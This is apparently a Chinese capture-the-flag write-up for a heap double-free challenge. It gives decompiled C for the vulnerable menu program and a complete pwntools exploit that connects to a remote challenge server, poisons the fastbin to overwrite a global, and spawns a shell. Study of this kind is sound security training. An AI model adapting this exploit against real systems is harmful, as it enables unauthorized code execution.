pwn-堆(double free)
heap_Double_Free
int __fastcall __noreturn main(int argc, const char **argv, const char **envp)
{
int v3; // ebx
int Choice; // [rsp+4h] [rbp-7Ch] BYREF
int ID; // [rsp+8h] [rbp-78h] BYREF
int size; // [rsp+Ch] [rbp-74h] BYREF
char *ptr[10]; // [rsp+10h] [rbp-70h] BYREF
unsigned __int64 v8; // [rsp+68h] [rbp-18h]
v8 = __readfsqword(0x28u);
init();
globals1[0] = 0;
globals1[2] = 113;
memset(ptr, 0, sizeof(ptr));
while ( 1 )
{
while ( 1 )
{
Menu();
printf("root@ubuntu:~/Desktop$ ");
__isoc99_scanf("%d", &Choice);
ID %= 10;
if ( Choice != 1 )
break;
puts("please input id and size :");
__isoc99_scanf("%d", &ID);
__isoc99_scanf("%d%*c", &size);
v3 = ID;
ptr[v3] = (char *)malloc(size);
puts("please input contet:");
gets(ptr[ID]);
}
if ( Choice == 2 )
{
puts("please input id :");
__isoc99_scanf("%d", &ID);
free(ptr[ID]);
}
else if ( Choice == 3 )
{
puts("please input id :");
__isoc99_scanf("%d", &ID);
puts(ptr[ID]);
}
else
{
if ( globals1[4] != 0x101 )
{
printf("exit!");
exit(0);
}
puts("your are got it!");
system("/bin/sh");
}
}
}
exp
from pwn import *
#r = process("./heap_Double_Free")
r = remote("1.95.36.136", 2138)
context(log_level='debug')
def molloc(id, size, content):
r.recvuntil(b"root@ubuntu:~/Desktop$ ")
r.sendline(b'1')
r.recvuntil(b"please input id and size :\n")
r.sendline(str(id).encode())
r.sendline(str(size).encode())
r.recvuntil(b"please input contet:\n")
r.sendline(content)
def free(id):
r.recvuntil(b"root@ubuntu:~/Desktop$ ")
r.sendline(b"2")
r.recvuntil(b"please input id :\n")
r.sendline(str(id).encode())
def shell():
r.recvuntil(b"root@ubuntu:~/Desktop$ ")
r.sendline(b"4")
molloc(0, 0x68, b'a' * 0x68)
molloc(1, 0x68, b'a' * 0x68)
molloc(2, 0x68, b'a' * 0x68)
free(0)
free(1)
free(0)
molloc(3,0x68,p64(0x6010A0))
molloc(4,0x68,b'a')
molloc(5,0x68,b'a')
molloc(6,0x68,p64(0x101))
shell()
#gdb.attach(r)
r.interactive()
浙公网安备 33010602011771号